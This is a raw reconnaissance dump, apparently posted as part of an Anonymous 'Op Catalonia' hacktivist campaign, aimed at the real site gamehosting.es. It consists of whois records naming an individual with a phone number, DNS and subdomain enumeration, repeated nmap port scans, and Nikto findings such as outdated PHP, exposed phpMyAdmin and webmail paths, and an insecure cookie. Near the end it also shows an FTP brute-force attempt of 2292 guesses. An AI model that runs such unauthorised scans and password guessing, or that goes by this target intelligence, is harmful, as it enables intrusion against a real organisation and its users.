Anonymous JTSEC #Op Catalonia Full Recon #1

1. #######################################################################################################################################
2. Nom de l'hôte gamehosting.es FAI OVH SAS
3. Continent Europe Drapeau
4. FR
5. Pays France Code du pays FR
6. Région Inconnu Heure locale 11 Nov 2018 18:19 CET
7. Ville Inconnu Code Postal Inconnu
8. Adresse IP 5.135.156.30 Latitude 48.858
9. Longitude 2.339
10.  
11. A######################################################################################################################################
12. > gamehosting.es
13. Server: 194.187.251.67
14. Address: 194.187.251.67#53
15.  
16. Non-authoritative answer:
17. Name: gamehosting.es
18. Address: 5.135.156.30
19. #######################################################################################################################################
20. HostIP:5.135.156.30
21. HostName:gamehosting.es
22.  
23. Gathered Inet-whois information for 5.135.156.30
24. ---------------------------------------------------------------------------------------------------------------------------------------
25.  
26.  
27. inetnum: 5.135.152.0 - 5.135.159.255
28. netname: OVH
29. descr: OVH SAS
30. descr: Dedicated servers
31. descr: http://www.ovh.com
32. country: FR
33. admin-c: OK217-RIPE
34. tech-c: OTC2-RIPE
35. status: ASSIGNED PA
36. mnt-by: OVH-MNT
37. created: 2013-08-23T21:30:08Z
38. last-modified: 2013-08-23T21:30:08Z
39. source: RIPE # Filtered
40.  
41. role: OVH Technical Contact
42. address: OVH SAS
43. address: 2 rue Kellermann
44. address: 59100 Roubaix
45. address: France
46. admin-c: OK217-RIPE
47. tech-c: GM84-RIPE
48. tech-c: SL10162-RIPE
49. nic-hdl: OTC2-RIPE
50. abuse-mailbox: abuse@ovh.net
51. mnt-by: OVH-MNT
52. created: 2004-01-28T17:42:29Z
53. last-modified: 2014-09-05T10:47:15Z
54. source: RIPE # Filtered
55.  
56. person: Octave Klaba
57. address: OVH SAS
58. address: 2 rue Kellermann
59. address: 59100 Roubaix
60. address: France
61. phone: +33 9 74 53 13 23
62. nic-hdl: OK217-RIPE
63. mnt-by: OVH-MNT
64. created: 1970-01-01T00:00:00Z
65. last-modified: 2017-10-30T21:44:51Z
66. source: RIPE # Filtered
67.  
68. % Information related to '5.135.0.0/16AS16276'
69.  
70. route: 5.135.0.0/16
71. descr: OVH
72. origin: AS16276
73. mnt-by: OVH-MNT
74. created: 2012-07-06T13:00:08Z
75. last-modified: 2012-07-06T13:00:08Z
76. source: RIPE # Filtered
77.  
78. % This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)
79.  
80.  
81.  
82. Gathered Inic-whois information for gamehosting.es
83. ---------------------------------------------------------------------------------------------------------------------------------------
84.  
85. Gathered Netcraft information for gamehosting.es
86. ---------------------------------------------------------------------------------------------------------------------------------------
87.  
88. Retrieving Netcraft.com information for gamehosting.es
89. Netcraft.com Information gathered
90.  
91. Gathered Subdomain information for gamehosting.es
92. ---------------------------------------------------------------------------------------------------------------------------------------
93. Searching Google.com:80...
94. Searching Altavista.com:80...
95. Found 0 possible subdomain(s) for host gamehosting.es, Searched 0 pages containing 0 results
96.  
97. Gathered E-Mail information for gamehosting.es
98. ---------------------------------------------------------------------------------------------------------------------------------------
99. Searching Google.com:80...
100. Searching Altavista.com:80...
101. Found 0 E-Mail(s) for host gamehosting.es, Searched 0 pages containing 0 results
102.  
103. Gathered TCP Port information for 5.135.156.30
104. ---------------------------------------------------------------------------------------------------------------------------------------
105.  
106. Port State
107.  
108. 21/tcp open
109. 22/tcp open
110. 80/tcp open
111. 110/tcp open
112. 143/tcp open
113.  
114. Portscan Finished: Scanned 150 ports, 2 ports were in state closed
115.  
116. #######################################################################################################################################
117. [i] Scanning Site: http://gamehosting.es
118.  
119.  
120.  
121. B A S I C I N F O
122. =======================================================================================================================================
123.  
124.  
125. [+] Site Title: Game Hosting Espa&ntildea
126. [+] IP address: 5.135.156.30
127. [+] Web Server: Could Not Detect
128. [+] CMS: Could Not Detect
129. [+] Cloudflare: Not Detected
130. [+] Robots File: Found
131.  
132. -------------[ contents ]----------------
133. # vestacp autogenerated robots.txt
134. User-agent: *
135. Crawl-delay: 10
136.  
137. -----------[end of contents]-------------
138.  
139.  
140.  
141.  
142. G E O I P L O O K U P
143. =======================================================================================================================================
144.  
145. [i] IP Address: 5.135.156.30
146. [i] Country: FR
147. [i] State: N/A
148. [i] City: N/A
149. [i] Latitude: 48.858200
150. [i] Longitude: 2.338700
151.  
152.  
153.  
154.  
155. H T T P H E A D E R S
156. =======================================================================================================================================
157.  
158.  
159. [i] HTTP/1.1 200 OK
160. [i] Date: Sun, 11 Nov 2018 17:25:13 GMT
161. [i] Content-Type: text/html
162. [i] Content-Length: 19383
163. [i] Last-Modified: Tue, 03 Jan 2017 18:35:34 GMT
164. [i] ETag: "1801962-4bb7-54534ef012980"
165. [i] Accept-Ranges: bytes
166. [i] Vary: Accept-Encoding
167. [i] Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
168. [i] X-Frame-Options: SAMEORIGIN
169. [i] X-Content-Type-Options: nosniff
170. [i] Connection: close
171.  
172.  
173.  
174.  
175. D N S L O O K U P
176. =======================================================================================================================================
177.  
178. gamehosting.es. 3599 IN SOA dns110.ovh.net. tech.ovh.net. 2018081804 86400 3600 3600000 300
179. gamehosting.es. 3599 IN NS ns110.ovh.net.
180. gamehosting.es. 3599 IN NS dns110.ovh.net.
181. gamehosting.es. 3599 IN MX 1 gamehosting.es.
182. gamehosting.es. 3599 IN A 5.135.156.30
183. gamehosting.es. 599 IN TXT "gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all"
184. gamehosting.es. 599 IN TXT "k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB"
185. gamehosting.es. 599 IN TXT "1|www.gamehosting.es"
186. gamehosting.es. 599 IN TXT "gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all"
187. gamehosting.es. 599 IN TXT "v=spf1 a mx ~all"
188. gamehosting.es. 3599 IN CAA 255 issue "letsencrypt.org"
189.  
190.  
191.  
192.  
193. S U B N E T C A L C U L A T I O N
194. =======================================================================================================================================
195.  
196. Address = 5.135.156.30
197. Network = 5.135.156.30 / 32
198. Netmask = 255.255.255.255
199. Broadcast = not needed on Point-to-Point links
200. Wildcard Mask = 0.0.0.0
201. Hosts Bits = 0
202. Max. Hosts = 1 (2^0 - 0)
203. Host Range = { 5.135.156.30 - 5.135.156.30 }
204.  
205.  
206.  
207. N M A P P O R T S C A N
208. =======================================================================================================================================
209.  
210.  
211. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-11 17:25 UTC
212. Nmap scan report for gamehosting.es (5.135.156.30)
213. Host is up (0.074s latency).
214. PORT STATE SERVICE
215. 21/tcp open ftp
216. 22/tcp open ssh
217. 23/tcp filtered telnet
218. 80/tcp open http
219. 110/tcp open pop3
220. 143/tcp open imap
221. 443/tcp open https
222. 3389/tcp filtered ms-wbt-server
223.  
224. Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
225.  
226.  
227.  
228. S U B - D O M A I N F I N D E R
229. =======================================================================================================================================
230.  
231.  
232. [i] Total Subdomains Found : 1
233.  
234. [+] Subdomain: www.gamehosting.es
235. [-] IP: 213.186.33.5
236.  
237.  
238.  
239. #######################################################################################################################################
240. [?] Enter the target: http://gamehosting.es/
241. [!] IP Address : 5.135.156.30
242. [+] Operating System : Ubuntu 12.04"
243. [!] gamehosting.es doesn't seem to use a CMS
244. [+] Honeypot Probabilty: 30%
245. ---------------------------------------------------------------------------------------------------------------------------------------
246. [~] Trying to gather whois information for gamehosting.es
247. [+] Whois information found
248. [-] Unable to build response, visit https://who.is/whois/gamehosting.es
249. ---------------------------------------------------------------------------------------------------------------------------------------
250. PORT STATE SERVICE
251. 21/tcp open ftp
252. 22/tcp open ssh
253. 23/tcp filtered telnet
254. 80/tcp open http
255. 110/tcp open pop3
256. 143/tcp open imap
257. 443/tcp open https
258. 3389/tcp filtered ms-wbt-server
259. Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds
260. ---------------------------------------------------------------------------------------------------------------------------------------
261.  
262. [+] DNS Records
263. ns110.ovh.net. (213.251.128.154) AS16276 OVH SAS France
264. dns110.ovh.net. (213.251.188.154) AS16276 OVH SAS France
265.  
266. [+] MX Records
267. 1 (5.135.156.30) AS16276 OVH SAS France
268.  
269. [+] Host Records (A)
270. gamehosting.esHTTP: (gamehosting.es) (5.135.156.30) AS16276 OVH SAS France
271. www.gamehosting.esHTTP: (redirect.ovh.net) (213.186.33.5) AS16276 OVH SAS France
272.  
273. [+] TXT Records
274. "gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all"
275. "k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB"
276. "gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all"
277. "1|www.gamehosting.es"
278. "v=spf1 a mx ~all"
279.  
280. [+] DNS Map: https://dnsdumpster.com/static/map/gamehosting.es.png
281.  
282. [>] Initiating 3 intel modules
283. [>] Loading Alpha module (1/3)
284. [>] Beta module deployed (2/3)
285. [>] Gamma module initiated (3/3)
286.  
287.  
288. [+] Emails found:
289. ---------------------------------------------------------------------------------------------------------------------------------------
290. pixel-1541957128896755-web-@gamehosting.es
291. pixel-1541957130276949-web-@gamehosting.es
292.  
293. [+] Hosts found in search engines:
294. ---------------------------------------------------------------------------------------------------------------------------------------
295. [-] Resolving hostnames IPs...
296. 213.186.33.5:www.gamehosting.es
297. [+] Virtual hosts:
298. ---------------------------------------------------------------------------------------------------------------------------------------
299. [~] Crawling the target for fuzzable URLs
300. [-] No fuzzable URLs found
301.  
302. #######################################################################################################################################
303. [+] Hosting Info for Website: gamehosting.es
304. [+] Visitors per day: < 200
305. [+] IP Address: 5.135.156.30
306. [+] Hosting Company: Ovh Sas
307. [+] Hosting IP Range: 5.135.0.0 - 5.135.255.255 (65,536 ip)
308. [+] Hosting Address: 140 Quai Du Sartel, 59100 Roubaix, France
309. [+] Hosting Country: FRA
310. [+] Hosting Phone: +33 9 7453 1323, +33 3 2020 0957
311. [+] Hosting Website: www.ovh.com
312. [+] Hosting CIDR: 5.135.0.0/16
313.  
314. [+] NS: dns110.ovh.net
315. [+] NS: ns110.ovh.net
316. #######################################################################################################################################
317. ; <<>> DiG 9.11.5-1-Debian <<>> gamehosting.es
318. ;; global options: +cmd
319. ;; Got answer:
320. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61389
321. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
322.  
323. ;; OPT PSEUDOSECTION:
324. ; EDNS: version: 0, flags:; udp: 4096
325. ;; QUESTION SECTION:
326. ;gamehosting.es. IN A
327.  
328. ;; ANSWER SECTION:
329. gamehosting.es. 3469 IN A 5.135.156.30
330.  
331. ;; Query time: 153 msec
332. ;; SERVER: 194.187.251.67#53(194.187.251.67)
333. ;; WHEN: dim nov 11 12:30:53 EST 2018
334. ;; MSG SIZE rcvd: 59
335.  
336. #######################################################################################################################################
337. ; <<>> DiG 9.11.5-1-Debian <<>> +trace gamehosting.es
338. ;; global options: +cmd
339. . 85816 IN NS f.root-servers.net.
340. . 85816 IN NS h.root-servers.net.
341. . 85816 IN NS l.root-servers.net.
342. . 85816 IN NS i.root-servers.net.
343. . 85816 IN NS c.root-servers.net.
344. . 85816 IN NS g.root-servers.net.
345. . 85816 IN NS k.root-servers.net.
346. . 85816 IN NS e.root-servers.net.
347. . 85816 IN NS m.root-servers.net.
348. . 85816 IN NS a.root-servers.net.
349. . 85816 IN NS j.root-servers.net.
350. . 85816 IN NS b.root-servers.net.
351. . 85816 IN NS d.root-servers.net.
352. . 85816 IN RRSIG NS 8 0 518400 20181124050000 20181111040000 2134 . fRNzy/nV2vjSz21ytxw2O+3ud+FbagBcxaPEfbwHnsMwrIouTBnkqROq 5BmwzDgojeg011yR/LWZg0YmnXPQeR8BnF8S2pQMTcOhZ3738x8pmJId YVP6bEWqwmv30N+YPrAqe4hmuFmaYGn0gMjzDXEGYIGHENBZRy8Ir6A+ vF/VRXlBFLKyRtQtSqNnLTlI9xpf5QfqXCT17XcHtjRc9vKDj6w35MFZ YIz0SNuSKizuB8pg4j+SXLryNaANiWd9zt6b6oR4YFPfceX7lmGGRivQ kVjM/EFFAwvi5gQOnJJLJNwUTOjFK7IXwR+C2idFmhAXZ2kdEMJuSTOS U/8CzA==
353. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 140 ms
354.  
355. es. 172800 IN NS ns1.cesca.es.
356. es. 172800 IN NS sns-pb.isc.org.
357. es. 172800 IN NS f.nic.es.
358. es. 172800 IN NS g.nic.es.
359. es. 172800 IN NS a.nic.es.
360. es. 172800 IN NS ns3.nic.fr.
361. es. 172800 IN NS ns-ext.nic.cl.
362. es. 86400 IN DS 44290 8 1 7711F564D55B41C8CE7DFAF4DD323C5B271F86CD
363. es. 86400 IN DS 44290 8 2 562EF35E7065588A7178A4BD0155C8527F029C82AA455DD359C84908 B2A7FE17
364. es. 86400 IN DS 29450 8 1 417BEAFB46ABF3430B75C5C29AEF785D476B60E1
365. es. 86400 IN DS 29450 8 2 8BEC32A2C9CFE42E393BAF81FFE71B521D3E940612A4590B4763ADC5 39E4B563
366. es. 86400 IN RRSIG DS 8 1 86400 20181124050000 20181111040000 2134 . Ae9MkKYVhLh1G0deO6QN4jRtGCDCJOn2BE0t/oevz+g4Iko2vjZiKpLj GGCE5ogTwcITfvjnk82/lzc8wZuhpHW1BhWHElOiTg9ykcyoX7CNDQpS wKacsfx2Biuqk0LAr1a2216pKvDffoNUaxaqbRJmvk8q17cqWgfX730T jaK7zpXay54gFgJDEFderWlGFLasFOjESKLzsHx5hWFeu+4xhYcaVopv nG/Hh3UvdhY+RCg+zH5hPPkBa4AxS/3FvD8bsFuiyFLFT0tfV6YhNz/B W5G3JvGhW68Rs0jYoW0Vf9PlbqJX8IS2IkD00QA1E9dKdvJfr8VewwOG +bYZ3g==
367. ;; Received 989 bytes from 199.9.14.201#53(b.root-servers.net) in 264 ms
368.  
369. gamehosting.es. 86400 IN NS dns110.ovh.net.
370. gamehosting.es. 86400 IN NS ns110.ovh.net.
371. spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 SPOVUI8LLS5HHLJ0I6TEK8ODTJ0PV8PM NS SOA RRSIG DNSKEY NSEC3PARAM
372. spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121051641 20181107010649 64315 es. WibiqeGxP7swWy8WJMC67rD0fXoQlpMxJPJJunU2YlLDMXZ3Fd4U2RK7 rHsIA/dsEO41GCa9V4v9khQBqCohEaxtna2hamwhfax+k2LsNP62oy0S nuP4HSwtH+fc4zBY5w42orQnksL0mxd4WgU0fC/zRJaOc5NelfeKRvM0 GAs=
373. mo9dip4huivh1hhlu5j6hgjj2qu63ocu.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 MOBVPQNHULLRM4LL1UVN8005RGNF6O7B NS DS RRSIG
374. mo9dip4huivh1hhlu5j6hgjj2qu63ocu.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121110255 20181107045751 64315 es. 2O0omcTApifGn4QwRHI2OsZvhYG/MJLyhQ+jCBLwiaYWTliR4+vpk4Cm m3k3kEAUHMWkKMuoKpecohQ/U2mrv4vr8ZVm8Qn+Tuc08SoRwQkzgsfp PaMTrHa5Zgb2BaUwfSHwHqbD2L74ahoSHeZTiHXhHO+k6dNJHhdOYtNK tGI=
375. ;; Received 618 bytes from 200.1.123.14#53(ns-ext.nic.cl) in 344 ms
376.  
377. gamehosting.es. 3600 IN A 5.135.156.30
378. ;; Received 59 bytes from 213.251.128.154#53(ns110.ovh.net) in 140 ms
379. #######################################################################################################################################
380. Traceroute 'gamehosting.es '
381. ---------------------------------------------------------------------------------------------------------------------------------------
382.  
383. Start: 2018-11-11T17:42:22+0000
384. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
385. 1.|-- 45.79.12.201 0.0% 3 0.8 0.8 0.8 0.8 0.0
386. 2.|-- 45.79.12.0 0.0% 3 0.5 1.5 0.5 2.5 1.0
387. 3.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
388. 4.|-- be100-2.dfw-da2-bb1-a9.tx.us 0.0% 3 1.9 1.9 1.8 2.1 0.2
389. 5.|-- ash-1-a9.tx.us 0.0% 3 32.1 32.0 31.6 32.3 0.3
390. 6.|-- be100-1039.nwk-1-a9.nj.us 0.0% 3 38.1 37.9 37.7 38.1 0.2
391. 7.|-- be100-1295.ldn-1-a9.uk.eu 0.0% 3 103.3 103.6 103.3 103.9 0.3
392. 8.|-- be100-1041.rbx-g1-nc5.fr.eu 0.0% 3 108.0 108.0 107.6 108.4 0.4
393. 9.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
394. 10.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
395. 11.|-- gamehosting.es 0.0% 3 109.8 109.9 109.6 110.4 0.4
396.  
397. #######################################################################################################################################
398. [*] Performing General Enumeration of Domain: gamehosting.es
399. [-] DNSSEC is not configured for gamehosting.es
400. [*] SOA dns110.ovh.net 213.251.188.154
401. [*] NS ns110.ovh.net 213.251.128.154
402. [*] Bind Version for 213.251.128.154 [Secured]
403. [*] NS ns110.ovh.net 2001:41d0:1:199a::1
404. [*] NS dns110.ovh.net 213.251.188.154
405. [*] Bind Version for 213.251.188.154 [Secured]
406. [*] NS dns110.ovh.net 2001:41d0:1:4a9a::1
407. [*] MX gamehosting.es 5.135.156.30
408. [*] A gamehosting.es 5.135.156.30
409. [*] TXT gamehosting.es k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB
410. [*] TXT gamehosting.es gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all
411. [*] TXT gamehosting.es 1|www.gamehosting.es
412. [*] TXT gamehosting.es v=spf1 a mx ~all
413. [*] TXT gamehosting.es gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all
414. [*] Enumerating SRV Records
415. [*] SRV _submission._tcp.gamehosting.es ssl0.ovh.net 193.70.18.144 465 0
416. [*] SRV _imaps._tcp.gamehosting.es ssl0.ovh.net 193.70.18.144 993 0
417. [+] 2 Records Found
418. #######################################################################################################################################
419. [*] Processing domain gamehosting.es
420. [+] Getting nameservers
421. 213.251.128.154 - ns110.ovh.net
422. 213.251.188.154 - dns110.ovh.net
423. [-] Zone transfer failed
424.  
425. [+] TXT records found
426. "k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB"
427. "gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all"
428. "1|www.gamehosting.es"
429. "v=spf1 a mx ~all"
430. "gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all"
431.  
432. [+] MX records found, added to target list
433. 1 gamehosting.es.
434.  
435. [*] Scanning gamehosting.es for A records
436. 5.135.156.30 - gamehosting.es
437. 5.135.156.30 - autoconfig.gamehosting.es
438. 5.135.156.30 - ftp.gamehosting.es
439. 193.70.18.144 - imap.gamehosting.es
440. 5.135.156.30 - mail.gamehosting.es
441. 5.135.156.30 - ns1.gamehosting.es
442. 5.135.156.30 - ns2.gamehosting.es
443. 5.135.156.30 - pop3.gamehosting.es
444. 5.135.156.30 - server.gamehosting.es
445. 5.135.156.30 - smtp.gamehosting.es
446. 5.135.156.30 - ssl.gamehosting.es
447. 5.135.156.30 - tracker.gamehosting.es
448. 213.186.33.5 - www.gamehosting.es
449. #######################################################################################################################################
450.  
451. [+] Testing domain
452. www.gamehosting.es 213.186.33.5
453. [+] Dns resolving
454. Domain name Ip address Name server
455. gamehosting.es 5.135.156.30 gamehosting.es
456. Found 1 host(s) for gamehosting.es
457. [+] Testing wildcard
458. Ok, no wildcard found.
459.  
460. [+] Scanning for subdomain on gamehosting.es
461. [!] Wordlist not specified. I scannig with my internal wordlist...
462. Estimated time about 89.98 seconds
463.  
464. Subdomain Ip address Name server
465.  
466. ftp.gamehosting.es 5.135.156.30 gamehosting.es
467. imap.gamehosting.es 193.70.18.144 ssl0.ovh.net
468. mail.gamehosting.es 5.135.156.30 gamehosting.es
469. ns1.gamehosting.es 5.135.156.30 gamehosting.es
470. ns2.gamehosting.es 5.135.156.30 gamehosting.es
471. pop3.gamehosting.es 5.135.156.30 gamehosting.es
472. server.gamehosting.es 5.135.156.30 gamehosting.es
473. smtp.gamehosting.es 5.135.156.30 gamehosting.es
474. ssl.gamehosting.es 5.135.156.30 gamehosting.es
475. tracker.gamehosting.es 5.135.156.30 gamehosting.es
476. www.gamehosting.es 213.186.33.5 redirect.ovh.net
477. #######################################################################################################################################
478.  
479. Ip Address Status Type Domain Name Server
480. ---------------------------------------------------------------------------------------------------------------------------------------
481. 5.135.156.30 200 alias ftp.gamehosting.es
482. 5.135.156.30 200 host gamehosting.es
483. 193.70.18.144 301 alias imap.gamehosting.es
484. 193.70.18.144 301 host ssl0.ovh.net
485. 5.135.156.30 200 alias mail.gamehosting.es
486. 5.135.156.30 200 host gamehosting.es
487. 5.135.156.30 200 host ns1.gamehosting.es
488. 5.135.156.30 200 host ns2.gamehosting.es
489. 5.135.156.30 200 alias pop3.gamehosting.es
490. 5.135.156.30 200 host gamehosting.es
491. 5.135.156.30 200 host server.gamehosting.es nginx
492. 5.135.156.30 200 alias smtp.gamehosting.es nginx
493. 5.135.156.30 200 host gamehosting.es nginx
494. 5.135.156.30 host ssl.gamehosting.es
495. 5.135.156.30 200 host tracker.gamehosting.es nginx
496. 213.186.33.5 200 host www.gamehosting.es nginx
497. #######################################################################################################################################
498.  
499. ; <<>> DiG 9.11.5-1-Debian <<>> gamehosting.es +dnssec
500. ;; global options: +cmd
501. ;; Got answer:
502. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6844
503. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
504.  
505. ;; OPT PSEUDOSECTION:
506. ; EDNS: version: 0, flags: do; udp: 4096
507. ;; QUESTION SECTION:
508. ;gamehosting.es. IN A
509.  
510. ;; ANSWER SECTION:
511. gamehosting.es. 2007 IN A 5.135.156.30
512.  
513. ;; Query time: 155 msec
514. ;; SERVER: 194.187.251.67#53(194.187.251.67)
515. ;; WHEN: dim nov 11 13:55:15 EST 2018
516. ;; MSG SIZE rcvd: 59
517.  
518. #######################################################################################################################################
519. ---------------------------------------------------------------------------------------------------------------------------------------
520. + Target IP: 5.135.156.30
521. + Target Hostname: 5.135.156.30
522. + Target Port: 443
523. ---------------------------------------------------------------------------------------------------------------------------------------
524. + SSL Info: Subject: /CN=gamehosting.es
525. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
526. Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
527. + Start Time: 2018-11-11 12:26:15 (GMT-5)
528. ---------------------------------------------------------------------------------------------------------------------------------------
529. + Server: nginx
530. + Server leaks inodes via ETags, header found with file /, inode: 25428511, size: 19427, mtime: Sun Apr 22 04:55:09 2018
531. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
532. + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
533. + Hostname '5.135.156.30' does not match certificate's names: gamehosting.es
534. + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
535. + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
536. + Uncommon header 'x-dns-prefetch-control' found, with contents: off
537. + Cookie roundcube_sessid created without the httponly flag
538. + /webmail/: Web based mail package installed.
539. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
540. + OSVDB-3233: /icons/README: Apache default file found.
541. + /phpmyadmin/: phpMyAdmin directory found
542. + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
543. + 8502 requests: 1 error(s) and 13 item(s) reported on remote host
544. + End Time: 2018-11-11 14:14:26 (GMT-5) (6491 seconds)
545. ---------------------------------------------------------------------------------------------------------------------------------------#######################################################################################################################################
546. ---------------------------------------------------------------------------------------------------------------------------------------
547. + Target IP: 5.135.156.30
548. + Target Hostname: gamehosting.es
549. + Target Port: 80
550. + Start Time: 2018-11-11 12:25:48 (GMT-5)
551. ---------------------------------------------------------------------------------------------------------------------------------------
552. + Server: No banner retrieved
553. + Server leaks inodes via ETags, header found with file /, inode: 25172322, size: 19383, mtime: Tue Jan 3 13:35:34 2017
554. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
555. + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
556. + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
557. + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
558. + Uncommon header 'x-dns-prefetch-control' found, with contents: off
559. + Cookie roundcube_sessid created without the httponly flag
560. + /webmail/: Web based mail package installed.
561. + Server banner has changed from '' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
562. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
563. + OSVDB-3233: /icons/README: Apache default file found.
564. + /phpmyadmin/: phpMyAdmin directory found
565. + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
566. + 26227 requests: 0 error(s) and 12 item(s) reported on remote host
567. + End Time: 2018-11-11 13:41:31 (GMT-5) (4543 seconds)
568. ---------------------------------------------------------------------------------------------------------------------------------------
569. #######################################################################################################################################
570.  
571. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:26 EST
572. Nmap scan report for 5.135.156.30
573. Host is up (0.14s latency).
574. Not shown: 418 filtered ports, 46 closed ports
575. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
576. PORT STATE SERVICE
577. 21/tcp open ftp
578. 22/tcp open ssh
579. 80/tcp open http
580. 110/tcp open pop3
581. 143/tcp open imap
582. 443/tcp open https
583. 465/tcp open smtps
584. 587/tcp open submission
585. 993/tcp open imaps
586. 995/tcp open pop3s
587. 2525/tcp open ms-v-worlds
588. 3306/tcp open mysql
589. #######################################################################################################################################
590. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:27 EST
591. Nmap scan report for 5.135.156.30
592. Host is up (0.13s latency).
593. Not shown: 2 filtered ports, 1 closed port
594. PORT STATE SERVICE
595. 53/udp open domain
596. 67/udp open|filtered dhcps
597. 68/udp open|filtered dhcpc
598. 69/udp open|filtered tftp
599. 88/udp open|filtered kerberos-sec
600. 123/udp open|filtered ntp
601. 139/udp open|filtered netbios-ssn
602. 161/udp open|filtered snmp
603. 162/udp open|filtered snmptrap
604. 389/udp open|filtered ldap
605. 520/udp open|filtered route
606.  
607. Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds
608. #######################################################################################################################################
609. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:27 EST
610. Nmap scan report for 5.135.156.30
611. Host is up (0.13s latency).
612.  
613. PORT STATE SERVICE VERSION
614. 21/tcp open ftp ProFTPD or KnFTPD
615. | ftp-brute:
616. | Accounts: No valid accounts found
617. |_ Statistics: Performed 2292 guesses in 193 seconds, average tps: 11.8
618. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
619. Aggressive OS guesses: OpenWrt Kamikaze 7.09 (Linux 2.6.22) (96%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (94%), OpenWrt White Russian 0.9 (Linux 2.4.30) (94%), Linux 2.4.18 (92%), OpenWrt (Linux 3.3) (92%), OpenWrt Attitude Adjustment 12.09 (Linux 3.3) (92%), Linux 3.0 (92%), Crestron XPanel control system (90%), OpenWrt (Linux 2.4.30 - 2.4.34) (89%), OpenWrt (Linux 2.4.32) (89%)
620. No exact OS matches for host (test conditions non-ideal).
621. Network Distance: 7 hops
622. Service Info: OS: Unix
623.  
624. TRACEROUTE (using port 21/tcp)
625. HOP RTT ADDRESS
626. 1 122.22 ms 10.248.200.1
627. 2 122.24 ms 185.94.189.129
628. 3 ...
629. 4 133.40 ms 94.23.122.146
630. 5 ... 6
631. 7 133.43 ms 5.135.156.30
632.  
633. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
634. Nmap done: 1 IP address (1 host up) scanned in 235.03 seconds
